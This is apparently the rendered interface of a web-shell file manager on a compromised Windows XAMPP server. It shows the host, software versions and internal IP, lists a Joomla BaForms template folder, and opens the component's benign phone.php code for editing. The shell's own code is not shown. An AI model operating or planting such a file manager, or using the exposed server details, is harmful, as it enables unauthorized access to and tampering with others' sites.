[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
components
/
com_baforms
/
views
/
form
/
tmpl
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 submission
SET
[ DEL ]
📄 address.php
2,000 B
SET
[ EDIT ]
|
[ DEL ]
📄 column.php
550 B
SET
[ EDIT ]
|
[ DEL ]
📄 footer.php
1,004 B
SET
[ EDIT ]
|
[ DEL ]
📄 headline.php
1,057 B
SET
[ EDIT ]
|
[ DEL ]
📄 html.php
416 B
SET
[ EDIT ]
|
[ DEL ]
📄 input.php
7,737 B
SET
[ EDIT ]
|
[ DEL ]
📄 map.php
838 B
SET
[ EDIT ]
|
[ DEL ]
📄 page.php
2,867 B
SET
[ EDIT ]
|
[ DEL ]
📄 phone.php
2,616 B
SET
[ EDIT ]
|
[ DEL ]
📄 radio.php
3,445 B
SET
[ EDIT ]
|
[ DEL ]
📄 rating.php
3,214 B
SET
[ EDIT ]
|
[ DEL ]
📄 selectMultiple.php
2,010 B
SET
[ EDIT ]
|
[ DEL ]
📄 signature.php
1,783 B
SET
[ EDIT ]
|
[ DEL ]
📄 slider.php
3,974 B
SET
[ EDIT ]
|
[ DEL ]
📄 style.php
1,297 B
SET
[ EDIT ]
|
[ DEL ]
📄 submit.php
2,754 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: phone.php
<?php /** * @package BaForms * @author Balbooa http://www.balbooa.com/ * @copyright Copyright @ Balbooa * @license http://www.gnu.org/licenses/gpl.html GNU/GPL */ defined('_JEXEC') or die; ob_start(); $className = $field->options->suffix; if (in_array($field->key, self::$conditionLogic->hidden)) { $className .= ' hidden-condition-field'; } $help = ''; $default = baformsHelper::$countries->{$field->options->default}; if ($field->options->required && !empty($field->options->title)) { $help .= '<span class="required-star">*</span>'; } if (!empty($field->options->description)) { $help .= '<span class="ba-input-help"><i class="ba-form-icons ba-icon-help"></i>'; $help .= '<span class="ba-tooltip ba-top ba-hide-element">'; $help .= $field->options->description.'</span></span>'; } ?> <div class="ba-form-field-item ba-form-phone-field <?php echo $className; ?>" data-type="phone"> <div class="ba-input-wrapper"> <div class="ba-field-label-wrapper"> <span class="ba-input-label-wrapper" id="label-<?php echo $field->id; ?>"> <?php echo $field->options->title; ?> </span> <?php echo $help; ?> </div> <div class="ba-field-container"> <div class="ba-phone-countries-wrapper"> <div class="ba-phone-selected-country" data-default="<?php echo $default->flag; ?>"> <span class="ba-phone-flag ba-phone-flag-<?php echo $default->flag; ?>"></span> <span class="ba-phone-prefix">+<?php echo $default->prefix; ?></span> </div> <div class="ba-phone-countries-list-wrapper"> <span id="search-<?php echo $field->id; ?>"><?php echo JText::_('SEARCH'); ?></span> <input type="text" class="ba-phone-countries-search" aria-labelledby="search-<?php echo $field->id; ?>" placeholder="<?php echo JText::_('SEARCH'); ?>"> <ul class="ba-phone-countries-list"></ul> </div> </div> <input type="text" class="ba-phone-number-input"<?php echo $field->options->required ? ' required' : ''; ?> aria-labelledby="label-<?php echo $field->id; ?>" placeholder="<?php echo str_replace('X', '_', $default->placeholder); ?>" data-prefix="+<?php echo $default->prefix; ?>"> <input type="hidden" name="<?php echo $field->id; ?>" data-field-id="<?php echo $field->key; ?>"> </div> </div> </div> <?php $out = ob_get_contents(); ob_end_clean();